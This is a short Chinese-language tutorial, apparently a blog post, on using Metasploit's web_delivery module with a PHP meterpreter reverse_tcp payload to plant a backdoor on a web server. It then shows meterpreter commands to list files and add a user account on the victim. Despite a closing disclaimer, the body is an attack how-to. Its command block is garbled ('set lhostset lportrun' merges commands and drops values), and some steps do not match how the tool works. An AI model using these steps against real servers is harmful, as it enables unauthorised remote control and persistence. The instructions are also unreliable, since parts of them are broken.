今天我們來說一下metasploit中的php后門。php后門是一種通過在服務器上植入惡意php腳本從而實現對服務器的遠程控制的方式。我們使用metasploit來生成php后門，這樣就可以將惡意代碼插入到服務器上并進行操作。

使用metasploit生成php后門的方法如下：

msfconsole
use exploit/multi/script/web_delivery
set payload php/meterpreter/reverse_tcp
set target 2
set lhostset lportrun

運行后，metasploit將會提示你使用哪種方式將后門文件上傳到服務器上，例如上傳到一個包含漏洞的網站目錄中。一旦文件被上傳并被受害者訪問，metasploit就會與目標機器建立一個反向連接。

通過metasploit可以執行各種操作，如查看服務器文件、執行命令等。例如，我們可以使用以下命令列出服務器上所有文件：

meterpreter>ls

我們還可以執行任意命令，例如添加一個新用戶：

meterpreter>useradd -u 1010 -g 1010 -d /home/testuser -s /bin/bash testuser

總之，metasploit是一個強大的工具，可以用于生成各種類型的后門，包括php后門。使用這些后門來攻擊受害服務器是非常危險的，并將受到法律責任。我們強烈反對將這些技術用于非法目的。